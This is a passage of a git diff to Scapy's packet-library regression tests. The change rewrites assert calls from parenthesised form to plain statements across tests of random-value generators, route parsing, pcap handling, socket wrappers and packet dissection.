if six.PY2 else "2001:0db8::bfc4")) -assert(r6.command() == "RandIP6(ip6template='2001:db8::*')") +assert r6 == ("2001:0db8::efc9" if six.PY2 else "2001:0db8::bfc4") +assert r6.command() == "RandIP6(ip6template='2001:db8::*')" = RandMAC random.seed(0x2807) rm = RandMAC() -assert(rm == ("d2:12:e4:5a:db:ef" if six.PY2 else "24:23:b5:b7:d0:bf")) -assert(rm.command() == "RandMAC()") +assert rm == ("d2:12:e4:5a:db:ef" if six.PY2 else "24:23:b5:b7:d0:bf") +assert rm.command() == "RandMAC()" rm = RandMAC("00:01:02:03:04:0-7") -assert(rm == ("00:01:02:03:04:05" if six.PY2 else "00:01:02:03:04:01")) -assert(rm.command() == "RandMAC(template='00:01:02:03:04:0-7')") +assert rm == ("00:01:02:03:04:05" if six.PY2 else "00:01:02:03:04:01") +assert rm.command() == "RandMAC(template='00:01:02:03:04:0-7')" = RandOID random.seed(0x2807) ro = RandOID() -assert(ro == "7.222.44.194.276.116.320.6.84.97.31.5.25.20.13.84.104.18") -assert(ro.command() == "RandOID()") +assert ro == "7.222.44.194.276.116.320.6.84.97.31.5.25.20.13.84.104.18" +assert ro.command() == "RandOID()" ro = RandOID("1.2.3.*") -assert(ro == "1.2.3.41") -assert(ro.command() == "RandOID(fmt='1.2.3.*')") +assert ro == "1.2.3.41" +assert ro.command() == "RandOID(fmt='1.2.3.*')" ro = RandOID("1.2.3.0-28") -assert(ro == ("1.2.3.11" if six.PY2 else "1.2.3.12")) -assert(ro.command() == "RandOID(fmt='1.2.3.0-28')") +assert ro == ("1.2.3.11" if six.PY2 else "1.2.3.12") +assert ro.command() == "RandOID(fmt='1.2.3.0-28')" ro = RandOID("1.2.3.0-28", depth=RandNumExpo(0.2), idnum=RandNumExpo(0.02)) -assert(ro.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), idnum=RandNumExpo(lambd=0.02))") +assert ro.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), idnum=RandNumExpo(lambd=0.02))" = RandRegExp ~ not_pyannotate @@ -62,7 +62,7 @@ assert(ro.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), random.seed(0x2807) rex = RandRegExp("[g-v]* @? [0-9]{3} . (g|v)") bytes(rex) == ('vmuvr @ 906 \x9e g' if six.PY2 else b'irrtv @ 517 \xc2\xb8 v') -assert(rex.command() == "RandRegExp(regexp='[g-v]* @? [0-9]{3} . (g|v)')") +assert rex.command() == "RandRegExp(regexp='[g-v]* @? [0-9]{3} . (g|v)')" rex = RandRegExp("[:digit:][:space:][:word:]") assert re.match(b"\\d\\s\\w", bytes(rex)) @@ -71,37 +71,37 @@ assert re.match(b"\\d\\s\\w", bytes(rex)) random.seed(0x2807) cb = CorruptedBytes("ABCDE", p=0.5) -assert(cb.command() == "CorruptedBytes(s='ABCDE', p=0.5)") -assert(sane(raw(cb)) in [".BCD)", "&BCDW"]) +assert cb.command() == "CorruptedBytes(s='ABCDE', p=0.5)" +assert sane(raw(cb)) in [".BCD)", "&BCDW"] cb = CorruptedBits("ABCDE", p=0.2) -assert(cb.command() == "CorruptedBits(s='ABCDE', p=0.2)") -assert(sane(raw(cb)) in ["ECk@Y", "QB.P."]) +assert cb.command() == "CorruptedBits(s='ABCDE', p=0.2)" +assert sane(raw(cb)) in ["ECk@Y", "QB.P."] = RandEnumKeys random.seed(0x2807) rek = RandEnumKeys({'a': 1, 'b': 2, 'c': 3}, seed=0x2807) rek.enum.sort() -assert(rek.command() == "RandEnumKeys(enum=['a', 'b', 'c'], seed=10247)") +assert rek.command() == "RandEnumKeys(enum=['a', 'b', 'c'], seed=10247)" r = str(rek) -assert(r == ('c' if six.PY2 else 'a')) +assert r == ('c' if six.PY2 else 'a') = RandSingNum random.seed(0x2807) rs = RandSingNum(-28, 7) -assert(rs._fix() in [2, 3]) -assert(rs.command() == "RandSingNum(mn=-28, mx=7)") +assert rs._fix() in [2, 3] +assert rs.command() == "RandSingNum(mn=-28, mx=7)" = Rand* random.seed(0x2807) rss = RandSingString() -assert(rss == ("CON:" if six.PY2 else "foo.exe:")) -assert(rss.command() == "RandSingString()") +assert rss == ("CON:" if six.PY2 else "foo.exe:") +assert rss.command() == "RandSingString()" random.seed(0x2807) rts = RandTermString(4, "scapy") -assert(sane(raw(rts)) in ["...Zscapy", "$#..scapy"]) -assert(rts.command() == "RandTermString(size=4, term=%s'scapy')" % '' if six.PY2 else 'b') +assert sane(raw(rts)) in ["...Zscapy", "$#..scapy"] +assert rts.command() == "RandTermString(size=4, term=%s'scapy')" % '' if six.PY2 else 'b' = RandInt (test __bool__) a = "True" if RandNum(False, True) else "False" diff --git a/test/regression.uts b/test/regression.uts index e141d498399..e4a05e0124c 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -95,8 +95,8 @@ def test_list_contrib(): with ContextManagerCaptureOutput() as cmco: list_contrib() result_list_contrib = cmco.get_output() - assert("http2 : HTTP/2 (RFC 7540, RFC 7541) status=loads" in result_list_contrib) - assert(len(result_list_contrib.split('\n')) > 40) + assert "http2 : HTTP/2 (RFC 7540, RFC 7541) status=loads" in result_list_contrib + assert len(result_list_contrib.split('\n')) > 40 test_list_contrib() @@ -391,7 +391,7 @@ conf.route6 # Doesn't pass on Travis Bionic XXX if len(routes6) > 2 and not WINDOWS: # Identify routes to fe80::/64 - assert(sum(1 for r in routes6 if r[0] == "::1" and r[4] == ["::1"]) >= 1) + assert sum(1 for r in routes6 if r[0] == "::1" and r[4] == ["::1"]) >= 1 if not OPENBSD and len(iflist) >= 2: assert sum(1 for r in routes6 if r[0] == "fe80::" and r[1] == 64) >= 1 try: @@ -493,7 +493,7 @@ def set_var(var, value): six.moves.builtins.__dict__["scapy_session"][var] = value def del_var(var): - del(six.moves.builtins.__dict__["scapy_session"][var]) + del six.moves.builtins.__dict__["scapy_session"][var] init_session(None, {"init_value": 123}) set_var("test_value", "8.8.8.8") # test_value = "8.8.8.8" @@ -537,15 +537,15 @@ scapy_delete_temp_files() tmpfile = get_temp_file(autoext=".ut") tmpfile if WINDOWS: - assert("scapy" in tmpfile and tmpfile.lower().startswith('c:\\users\\appveyor\\appdata\\local\\temp')) + assert "scapy" in tmpfile and tmpfile.lower().startswith('c:\\users\\appveyor\\appdata\\local\\temp') else: import platform BYPASS_TMP = platform.python_implementation().lower() == "pypy" or DARWIN - assert("scapy" in tmpfile and (BYPASS_TMP == True or "/tmp/" in tmpfile)) + assert "scapy" in tmpfile and (BYPASS_TMP == True or "/tmp/" in tmpfile) -assert(conf.temp_files[0].endswith(".ut")) +assert conf.temp_files[0].endswith(".ut") scapy_delete_temp_files() -assert(len(conf.temp_files) == 0) +assert len(conf.temp_files) == 0 = Emulate interact() import mock, sys @@ -665,9 +665,9 @@ except: sane("A\x00\xFFB") == "A..B" = Test lhex function -assert(lhex(42) == "0x2a") -assert(lhex((28,7)) == "(0x1c, 0x7)") -assert(lhex([28,7]) == "[0x1c, 0x7]") +assert lhex(42) == "0x2a" +assert lhex((28,7)) == "(0x1c, 0x7)" +assert lhex([28,7]) == "[0x1c, 0x7]" = Test restart function import mock @@ -709,8 +709,8 @@ repr_hex("scapy") == "7363617079" hexstr(b"A\x00\xFFB") == "41 00 FF 42 A..B" = Test fletcher16 functions -assert(fletcher16_checksum(b"\x28\x07") == 22319) -assert(fletcher16_checkbytes(b"\x28\x07", 1) == b"\xaf(") +assert fletcher16_checksum(b"\x28\x07") == 22319 +assert fletcher16_checkbytes(b"\x28\x07", 1) == b"\xaf(" = Test hexdiff function ~ not_pypy @@ -792,8 +792,8 @@ def test_export_import_object(): with ContextManagerCaptureOutput() as cmco: export_object(2807) result_export_object = cmco.get_output(eval_bytes=True) - assert(result_export_object.startswith("eNprYPL9zqUHAAdrAf8=")) - assert(import_object(result_export_object) == 2807) + assert result_export_object.startswith("eNprYPL9zqUHAAdrAf8=") + assert import_object(result_export_object) == 2807 test_export_import_object() @@ -802,39 +802,39 @@ tex_escape("$#_") == "\\$\\#\\_" = Test colgen function f = colgen(range(3)) -assert(len([next(f) for i in range(2)]) == 2) +assert len([next(f) for i in range(2)]) == 2 = Test incremental_label function f = incremental_label() -assert([next(f) for i in range(2)] == ["tag00000", "tag00001"]) +assert [next(f) for i in range(2)] == ["tag00000", "tag00001"] = Test corrupt_* functions import random random.seed(0x2807) -assert(corrupt_bytes("ABCDE") in [b"ABCDW", b"ABCDX"]) -assert(sane(corrupt_bytes("ABCDE", n=3)) in ["A.8D4", ".2.DE"]) +assert corrupt_bytes("ABCDE") in [b"ABCDW", b"ABCDX"] +assert sane(corrupt_bytes("ABCDE", n=3)) in ["A.8D4", ".2.DE"] -assert(corrupt_bits("ABCDE") in [b"EBCDE", b"ABCDG"]) -assert(sane(corrupt_bits("ABCDE", n=3)) in ["AF.EE", "QB.TE"]) +assert corrupt_bits("ABCDE") in [b"EBCDE", b"ABCDG"] +assert sane(corrupt_bits("ABCDE", n=3)) in ["AF.EE", "QB.TE"] = Test save_object and load_object functions import tempfile fd, fname = tempfile.mkstemp() save_object(fname, 2807) -assert(load_object(fname) == 2807) +assert load_object(fname) == 2807 = Test whois function ~ netaccess if not WINDOWS: result = whois("193.0.6.139") - assert(b"inetnum" in result and b"Amsterdam" in result) + assert b"inetnum" in result and b"Amsterdam" in result = Test manuf DB methods ~ manufdb -assert(conf.manufdb._resolve_MAC("00:00:0F:01:02:03") == "Next:01:02:03") -assert(conf.manufdb._get_short_manuf("00:00:0F:01:02:03") == "Next") -assert(in6_addrtovendor("fe80::0200:0fff:fe01:0203").lower().startswith("next")) +assert conf.manufdb._resolve_MAC("00:00:0F:01:02:03") == "Next:01:02:03" +assert conf.manufdb._get_short_manuf("00:00:0F:01:02:03") == "Next" +assert in6_addrtovendor("fe80::0200:0fff:fe01:0203").lower().startswith("next") assert conf.manufdb.lookup("00:00:0F:01:02:03") == ('Next', 'Next, Inc.') assert "00:00:0F" in conf.manufdb.reverse_lookup("Next") @@ -918,15 +918,15 @@ atol("www.secdev.org") == 3642339845 ret = autorun_get_text_interactive_session("IP().src") ret -assert(ret == (">>> IP().src\n'127.0.0.1'\n", '127.0.0.1')) +assert ret == (">>> IP().src\n'127.0.0.1'\n", '127.0.0.1') ret = autorun_get_html_interactive_session("IP().src") ret -assert(ret == (">>> IP().src\n'127.0.0.1'\n", '127.0.0.1')) +assert ret == (">>> IP().src\n'127.0.0.1'\n", '127.0.0.1') ret = autorun_get_latex_interactive_session("IP().src") ret -assert(ret == ("\\textcolor{blue}{{\\tt\\char62}{\\tt\\char62}{\\tt\\char62} }IP().src\n'127.0.0.1'\n", '127.0.0.1')) +assert ret == ("\\textcolor{blue}{{\\tt\\char62}{\\tt\\char62}{\\tt\\char62} }IP().src\n'127.0.0.1'\n", '127.0.0.1') ret = autorun_get_text_interactive_session("scapy_undefined") assert "NameError" in ret[0] @@ -959,7 +959,7 @@ os.write(fd, b"conf.verb = 42\n") os.close(fd) from scapy.main import _read_config_file _read_config_file(fname, globals(), locals()) -assert(conf.verb == 42) +assert conf.verb == 42 conf.verb = saved_conf_verb = Test config file functions failures @@ -988,7 +988,7 @@ from mock import MagicMock, patch bck_scapy_libs_matplot = sys.modules.get("scapy.libs.matplot", None) if bck_scapy_libs_matplot: - del(sys.modules["scapy.libs.matplot"]) + del sys.modules["scapy.libs.matplot"] mock_matplotlib = MagicMock() mock_matplotlib.get_backend.return_value = "inline" @@ -1021,30 +1021,30 @@ if bck_scapy_libs_matplot: = Packet class methods p = IP()/ICMP() ret = p.do_build_ps() -assert(ret[0] == b"@\x00\x00\x00\x00\x01\x00\x00@\x01\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\x00\x00\x00\x00\x00\x00") -assert(len(ret[1]) == 2) +assert ret[0] == b"@\x00\x00\x00\x00\x01\x00\x00@\x01\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\x00\x00\x00\x00\x00\x00" +assert len(ret[1]) == 2 -assert(p[ICMP].firstlayer() == p) +assert p[ICMP].firstlayer() == p -assert(p.command() == "IP()/ICMP()") +assert p.command() == "IP()/ICMP()" p.decode_payload_as(UDP) -assert(p.sport == 2048 and p.dport == 63487) +assert p.sport == 2048 and p.dport == 63487 = hide_defaults conf_color_theme = conf.color_theme conf.color_theme = BlackAndWhite() p = IP(ttl=64)/ICMP() -assert(repr(p) in [">", ">"]) +assert repr(p) in [">", ">"] p.hide_defaults() -assert(repr(p) in [">", ">"]) +assert repr(p) in [">", ">"] conf.color_theme = conf_color_theme = split_layers p = IP()/ICMP() s = raw(p) split_layers(IP, ICMP, proto=1) -assert(Raw in IP(s)) +assert Raw in IP(s) bind_layers(IP, ICMP, frag=0, proto=1) = fuzz @@ -1084,13 +1084,13 @@ IP().summary() a=IP(ttl=4)/TCP() a.ttl a.ttl=10 -del(a.ttl) +del a.ttl a.ttl TCP in a a[TCP] a[TCP].dport=[80,443] a -assert(a.copy().time == a.time) +assert a.copy().time == a.time a=3 = Bind string array as payload @@ -1286,27 +1286,27 @@ conf.checkIPsrc = conf_checkIPsrc = Padding assembly r = raw(Padding("abc")) r -assert(r == b"abc" ) +assert r == b"abc" r = raw(Padding("abc")/Padding("def")) r -assert(r == b"abcdef" ) +assert r == b"abcdef" r = raw(Raw("ABC")/Padding("abc")/Padding("def")) r -assert(r == b"ABCabcdef" ) +assert r == b"ABCabcdef" r = raw(Raw("ABC")/Padding("abc")/Raw("DEF")/Padding("def")) r -assert(r == b"ABCDEFabcdef") +assert r == b"ABCDEFabcdef" = Padding and length computation p = IP(raw(IP()/Padding("abc"))) p -assert(p.len == 20 and len(p) == 23) +assert p.len == 20 and len(p) == 23 p = IP(raw(IP()/Raw("ABC")/Padding("abc"))) p -assert(p.len == 23 and len(p) == 26) +assert p.len == 23 and len(p) == 26 p = IP(raw(IP()/Raw("ABC")/Padding("abc")/Padding("def"))) p -assert(p.len == 23 and len(p) == 29) +assert p.len == 23 and len(p) == 29 = PadField test ~ PadField padding @@ -1339,10 +1339,10 @@ class IPv3(IP): a = IPv3() v,t = a.version, a.ttl v,t -assert((v,t) == (3,32)) +assert (v,t) == (3,32) r = raw(a) r -assert(r == b'5\x00\x00\x14\x00\x01\x00\x00 \x00\xac\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01') +assert r == b'5\x00\x00\x14\x00\x01\x00\x00 \x00\xac\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01' ############ ############ @@ -1450,16 +1450,16 @@ retry_test(_test) ~ netaccess needs_root IP def _test(): tmp = send(IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), return_packets=True, realtime=True) - assert(len(tmp) == 1) + assert len(tmp) == 1 tmp = sendp(Ether()/IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), return_packets=True, realtime=True) - assert(len(tmp) == 1) + assert len(tmp) == 1 p = Ether()/IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S") from decimal import Decimal p.time = Decimal(p.time) tmp = sendp(p, return_packets=True, realtime=True) - assert(len(tmp) == 1) + assert len(tmp) == 1 retry_test(_test) @@ -1509,10 +1509,10 @@ retry_test(_test) ~ netaccess needs_root IP def _test(): tmp = srloop(IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), count=1, timeout=3) - assert(type(tmp) == tuple and len(tmp[0]) == 1) + assert type(tmp) == tuple and len(tmp[0]) == 1 tmp = srploop(Ether()/IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), count=1, timeout=3) - assert(type(tmp) == tuple and len(tmp[0]) == 1) + assert type(tmp) == tuple and len(tmp[0]) == 1 retry_test(_test) @@ -1613,8 +1613,8 @@ Bulk mode; whois.cymru.com [2017-10-03 08:38:08 +0000] 26496 | 68.178.213.61 | AS-26496-GO-DADDY-COM-LLC - GoDaddy.com, LLC, US """ tmp = AS_resolver_cymru().parse(cymru_bulk_data) -assert(len(tmp) == 3) -assert([l[1] for l in tmp] == ['AS24776', 'AS36459', 'AS26496']) +assert len(tmp) == 3 +assert [l[1] for l in tmp] == ['AS24776', 'AS36459', 'AS26496'] = AS resolver - IPv6 ~ netaccess IP @@ -2018,7 +2018,7 @@ fdesc.close() = Check offline sniff() (by PacketList) l=sniff(offline=PacketList([IP()/TCP(),IP()/TCP()])) assert len(l) == 2 -assert(all(TCP in p for p in l)) +assert all(TCP in p for p in l) = Check offline sniff() (by filename) assert list(pktpcap) == list(sniff(offline=filename)) @@ -2055,18 +2055,18 @@ fd.close() packets = sniff(offline=filename, filter="udp") os.unlink(filename) -assert(UDP in packets[0]) +assert UDP in packets[0] = Check offline sniff() with Packets and tcpdump ~ tcpdump l = sniff(offline=IP()/UDP(sport=(10000, 10001)), filter="udp") assert len(l) == 2 -assert(all(UDP in p for p in l)) +assert all(UDP in p for p in l) l = sniff(offline=[p for p in IP()/UDP(sport=(10000, 10001))], filter="udp") assert len(l) == 2 -assert(all(UDP in p for p in l)) +assert all(UDP in p for p in l) l = sniff(offline=IP()/UDP(sport=(10000, 10001)), filter="tcp") assert len(l) == 0 @@ -2444,7 +2444,7 @@ import tempfile filename = tempfile.mktemp(suffix=".pcap") wrpcap(filename, [IP()/UDP(), IPv6()/UDP()], linktype=DLT_RAW) packets = rdpcap(filename) -assert(isinstance(packets[0], IP) and isinstance(packets[1], IPv6)) +assert isinstance(packets[0], IP) and isinstance(packets[1], IPv6) = Check wrpcap() with no packet @@ -2578,8 +2578,8 @@ default link#11 UCSI 1 0 bridge1 scapy.arch.unix.NETBSD = False scapy.arch.unix.OPENBSD = False routes = read_routes() - assert(len(routes) == 4) - assert([r for r in routes if r[3] == "bridge10"]) + assert len(routes) == 4 + assert [r for r in routes if r[3] == "bridge10"] test_osx_netstat_truncated() @@ -2637,7 +2637,7 @@ default 192.168.28.1 UGSc 82 0 en0 routes = read_routes() for r in routes: print(r) - assert(len(routes) == 15) + assert len(routes) == 15 default_route = [r for r in routes if r[0] == 0][0] assert default_route[3] == "en0" and default_route[4] == "192.168.28.18" @@ -2845,19 +2845,19 @@ results_dict = _parse_tcpreplay_result(stdout, stderr, argv) results_dict -assert(results_dict["packets"] == 1024) -assert(results_dict["bytes"] == 198929) -assert(results_dict["time"] == 67.88) -assert(results_dict["bps"] == 2930.6) -assert(results_dict["mbps"] == 0.02) -assert(results_dict["pps"] == 15.09) -assert(results_dict["attempted"] == 1024) -assert(results_dict["successful"] == 1024) -assert(results_dict["failed"] == 0) -assert(results_dict["retried_enobufs"] == 0) -assert(results_dict["retried_eagain"] == 0) -assert(results_dict["command"] == " ".join(argv)) -assert(len(results_dict["warnings"]) == 3) +assert results_dict["packets"] == 1024 +assert results_dict["bytes"] == 198929 +assert results_dict["time"] == 67.88 +assert results_dict["bps"] == 2930.6 +assert results_dict["mbps"] == 0.02 +assert results_dict["pps"] == 15.09 +assert results_dict["attempted"] == 1024 +assert results_dict["successful"] == 1024 +assert results_dict["failed"] == 0 +assert results_dict["retried_enobufs"] == 0 +assert results_dict["retried_eagain"] == 0 +assert results_dict["command"] == " ".join(argv) +assert len(results_dict["warnings"]) == 3 = Test more recent version with flows @@ -2973,8 +2973,8 @@ ff02::%en0/32 link#4 UmCI routes = read_routes6() for r in routes: print(r) - assert(len(routes) == 6) - assert(check_mandatory_ipv6_routes(routes)) + assert len(routes) == 6 + assert check_mandatory_ipv6_routes(routes) test_osx_10_9_5() @@ -3023,11 +3023,11 @@ ff02::%lo0/32 ::1 UmCI from scapy.arch.unix import read_routes6 routes = read_routes6() print(routes) - assert(valid_output_read_routes6(routes)) + assert valid_output_read_routes6(routes) for r in routes: print(r) - assert(len(routes) == 11) - assert(check_mandatory_ipv6_routes(routes)) + assert len(routes) == 11 + assert check_mandatory_ipv6_routes(routes) test_osx_10_9_5_global() @@ -3069,8 +3069,8 @@ ff02::%en0/32 link#4 UmCI routes = read_routes6() for r in routes: print(r) - assert(len(routes) == 5) - assert(check_mandatory_ipv6_routes(routes)) + assert len(routes) == 5 + assert check_mandatory_ipv6_routes(routes) test_osx_10_10_4() @@ -3115,8 +3115,8 @@ ff02::%lo0/32 ::1 U lo0 scapy.arch.unix.OPENBSD = False for r in routes: print(r) - assert(len(routes) == 3) - assert(check_mandatory_ipv6_routes(routes)) + assert len(routes) == 3 + assert check_mandatory_ipv6_routes(routes) test_freebsd_10_2() @@ -3161,8 +3161,8 @@ default 10.0.0.1 UGS 3 1500 vtnet0 scapy.arch.unix.OPENBSD = False for r in routes: print(r) - assert(r[3] in ["vtnet0", "lo0"]) - assert(len(routes) == 4) + assert r[3] in ["vtnet0", "lo0"] + assert len(routes) == 4 test_freebsd_13() @@ -3222,8 +3222,8 @@ ff02::%lo0/32 fe80::1%lo0 UC 0 routes = read_routes6() for r in routes: print(r) - assert(len(routes) == 5) - assert(check_mandatory_ipv6_routes(routes)) + assert len(routes) == 5 + assert check_mandatory_ipv6_routes(routes) test_openbsd_5_5() @@ -3275,8 +3275,8 @@ ff02::%lo0/32 ::1 UC - routes = read_routes6() for r in routes: print(r) - assert(len(routes) == 5) - assert(check_mandatory_ipv6_routes(routes)) + assert len(routes) == 5 + assert check_mandatory_ipv6_routes(routes) test_netbsd_7_0() @@ -3365,7 +3365,7 @@ old_iface = conf.iface conf.route6.ipv6_ifaces = set(['eth1', 'lo']) conf.iface = "eth0" conf.route6.routes = [("fe80::", 64, "::", "eth1", ["fe80::a00:28ff:fe07:1980"], 256), ("::1", 128, "::", "lo", ["::1"], 0), ("fe80::a00:28ff:fe07:1980", 128, "::", "lo", ["::1"], 0)] -assert(conf.route6.route("fe80::2807") == ("eth1", "fe80::a00:28ff:fe07:1980", "::")) +assert conf.route6.route("fe80::2807") == ("eth1", "fe80::a00:28ff:fe07:1980", "::") conf.iface = old_iface conf.route6.resync() @@ -3398,7 +3398,7 @@ ssck.basecls = DNSTCP r = ssck.sr1(DNSTCP(dns=DNS(rd=1, qd=DNSQR(qname="www.example.com"))), timeout=3) sck.close() -assert(DNSTCP in r and len(r.dns.an)) +assert DNSTCP in r and len(r.dns.an) ############ + Tests of SSLStreamContext @@ -3432,18 +3432,18 @@ s = MockSocket() ss = SSLStreamSocket(s, basecls=TestPacket) p = ss.recv() -assert(p.data == 1) +assert p.data == 1 p = ss.recv() -assert(p.data == 2) +assert p.data == 2 p = ss.recv() -assert(p.data == 3) +assert p.data == 3 try: ss.recv() ret = False except socket.error: ret = True -assert(ret) +assert ret = Test with recv() calls that return twice as much data as the exact packet-length ~ sslraweamsocket @@ -3474,20 +3474,20 @@ s = MockSocket() ss = SSLStreamSocket(s, basecls=TestPacket) p = ss.recv() -assert(p.data == 1) +assert p.data == 1 p = ss.recv() -assert(p.data == 2) +assert p.data == 2 p = ss.recv() -assert(p.data == 3) +assert p.data == 3 p = ss.recv() -assert(p.data == 4) +assert p.data == 4 try: ss.recv() ret = False except socket.error: ret = True -assert(ret) +assert ret = Test with recv() calls that return not enough data ~ sslraweamsocket @@ -3523,34 +3523,34 @@ try: except: ret = True -assert(ret) +assert ret p = ss.recv() -assert(p.data == 1) +assert p.data == 1 try: p = ss.recv() ret = False except: ret = True -assert(ret) +assert ret p = ss.recv() -assert(p.data == 2) +assert p.data == 2 try: p = ss.recv() ret = False except: ret = True -assert(ret) +assert ret try: p = ss.recv() ret = False except: ret = True -assert(ret) +assert ret p = ss.recv() -assert(p.data == 3) +assert p.data == 3 ############ @@ -3591,7 +3591,7 @@ addr1, addr2 = inet_ntop(socket.AF_INET6, binfrm), _inet6_ntop(binfrm) # representation anyway. assert(addr1 in ['1111:2222:3333:4444:5555:6666:0:8888', '1111:2222:3333:4444:5555:6666::8888']) -assert(addr2 == '1111:2222:3333:4444:5555:6666:0:8888') +assert addr2 == '1111:2222:3333:4444:5555:6666:0:8888' = IPv6 bin to rawing conversion - Illegal sizes for binfrm in ["\x00" * 15, b"\x00" * 17]: @@ -4038,9 +4038,9 @@ os.write(fd, b"-- MIB test\nscapy OBJECT IDENTIFIER ::= {test 2807}\n") os.close(fd) load_mib(fname) -assert(sum(1 for k in six.itervalues(conf.mib.d) if "scapy" in k) == 1) +assert sum(1 for k in six.itervalues(conf.mib.d) if "scapy" in k) == 1 -assert(sum(1 for oid in conf.mib) > 100) +assert sum(1 for oid in conf.mib) > 100 = MIB - graph ~ mib @@ -4115,7 +4115,7 @@ except BER_BadTag_Decoding_Error: else: ret = False -assert(ret) +assert ret = BER trigger failures @@ -4141,8 +4141,8 @@ class Test(Packet): ] pkt = Test(raw(Test(Values=[0, 0, 0, 0, 1, 1, 1, 1]))) -assert(pkt.BitCount == 8) -assert(pkt.ByteCount == 1) +assert pkt.BitCount == 8 +assert pkt.ByteCount == 1 = PacketListField @@ -4152,10 +4152,10 @@ class TestPacket(Packet): a = TestPacket() a.list.append(1) -assert(len(a.list) == 1) +assert len(a.list) == 1 b = TestPacket() -assert(len(b.list) == 0) +assert len(b.list) == 0 = Test PacketListField deepcopy class SubPacket(Packet): @@ -4173,7 +4173,7 @@ class TestPacket(Packet): a = TestPacket() b = a.copy() fuzz(b) -assert(a.packlist[0].mem == 1) +assert a.packlist[0].mem == 1 = PacketField @@ -4368,9 +4368,9 @@ assert re.match(r'01234567-89ab-[0-9a-f]{4}-01[0-9a-f]{2}-[0-9a-f]{8}c[0-9]ef', = MPLS - build/dissection from scapy.contrib.mpls import EoMCW, MPLS p1 = MPLS()/IP()/UDP() -assert(p1[MPLS].s == 1) +assert p1[MPLS].s == 1 p2 = MPLS()/MPLS()/IP()/UDP() -assert(p2[MPLS].s == 0) +assert p2[MPLS].s == 0 p1[MPLS] p1[IP] @@ -4383,16 +4383,16 @@ p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") p /= MPLS(label=1)/EoMCW(seq=1234) p /= Ether(dst="33:33:33:33:33:33", src="44:44:44:44:44:44")/IP() p = Ether(raw(p)) -assert(p[EoMCW].zero == 0) -assert(p[EoMCW].reserved == 0) -assert(p[EoMCW].seq == 1234) +assert p[EoMCW].zero == 0 +assert p[EoMCW].reserved == 0 +assert p[EoMCW].seq == 1234 = MPLS encapsulated Ethernet without CW - build/dissection p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") p /= MPLS(label=2)/MPLS(label=1) p /= Ether(dst="33:33:33:33:33:33", src="44:44:44:44:44:44")/IP() p = Ether(raw(p)) -assert(p[Ether:2].type == 0x0800) +assert p[Ether:2].type == 0x0800 try: p[EoMCW] @@ -4401,8 +4401,8 @@ except IndexError: else: ret = False -assert(ret) -assert(p[Ether:2].type == 0x0800) +assert ret +assert p[Ether:2].type == 0x0800 = MPLS encapsulated IP - build/dissection p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") @@ -4416,7 +4416,7 @@ except IndexError: else: ret = False -assert(ret) +assert ret try: p[Ether:2] @@ -4425,7 +4425,7 @@ except IndexError: else: ret = False -assert(ret) +assert ret p[IP] @@ -4518,7 +4518,7 @@ def test_plot(mock_plt): mock_plt.plot = fake_plot plist = PacketList([IP(id=i)/TCP() for i in range(10)]) lines = plist.plot(lambda p: (p.time, p.id)) - assert(len(lines) == 10) + assert len(lines) == 10 test_plot() @@ -4534,7 +4534,7 @@ def test_diffplot(mock_plt): mock_plt.plot = fake_plot plist = PacketList([IP(id=i)/TCP() for i in range(10)]) lines = plist.diffplot(lambda x,y: (x.time, y.id-x.id)) - assert(len(lines) == 9) + assert len(lines) == 9 test_diffplot() @@ -4551,8 +4551,8 @@ def test_multiplot(mock_plt): tmp = [IP(id=i)/TCP() for i in range(10)] plist = PacketList([tuple(tmp[i-2:i]) for i in range(2, 10, 2)]) lines = plist.multiplot(lambda x: (x[1][IP].src, (x[1].time, x[1][IP].id))) - assert(len(lines) == 1) - assert(len(lines[0]) == 4) + assert len(lines) == 1 + assert len(lines[0]) == 4 test_multiplot() @@ -4563,8 +4563,8 @@ def test_rawhexdump(): p = PacketList([IP()/TCP() for i in range(2)]) p.rawhexdump() result_pl_rawhexdump = cmco.get_output() - assert(len(result_pl_rawhexdump.split('\n')) == 7) - assert(result_pl_rawhexdump.startswith("0000 45 00 00 28")) + assert len(result_pl_rawhexdump.split('\n')) == 7 + assert result_pl_rawhexdump.startswith("0000 45 00 00 28") test_rawhexdump() @@ -4575,8 +4575,8 @@ def test_hexraw(): p = PacketList([IP()/Raw(str(i)) for i in range(2)]) p.hexraw() result_pl_hexraw = cmco.get_output() - assert(len(result_pl_hexraw.split('\n')) == 5) - assert("0000 30" in result_pl_hexraw) + assert len(result_pl_hexraw.split('\n')) == 5 + assert "0000 30" in result_pl_hexraw test_hexraw() @@ -4587,8 +4587,8 @@ def test_hexdump(): p = PacketList([IP()/Raw(str(i)) for i in range(2)]) p.hexdump() result_pl_hexdump = cmco.get_output() - assert(len(result_pl_hexdump.split('\n')) == 7) - assert("0010 7F 00 00 01 31" in result_pl_hexdump) + assert len(result_pl_hexdump.split('\n')) == 7 + assert "0010 7F 00 00 01 31" in result_pl_hexdump test_hexdump() @@ -4630,8 +4630,8 @@ def test_padding(): p = PacketList([IP()/conf.padding_layer(str(i)) for i in range(2)]) p.padding() result_pl_padding = cmco.get_output() - assert(len(result_pl_padding.split('\n')) == 5) - assert("0000 30" in result_pl_padding) + assert len(result_pl_padding.split('\n')) == 5 + assert "0000 30" in result_pl_padding test_padding() @@ -4642,8 +4642,8 @@ def test_nzpadding(): p = PacketList([IP()/conf.padding_layer("A%s" % i) for i in range(2)]) p.nzpadding() result_pl_nzpadding = cmco.get_output() - assert(len(result_pl_nzpadding.split('\n')) == 5) - assert("0000 41 30" in result_pl_nzpadding) + assert len(result_pl_nzpadding.split('\n')) == 5 + assert 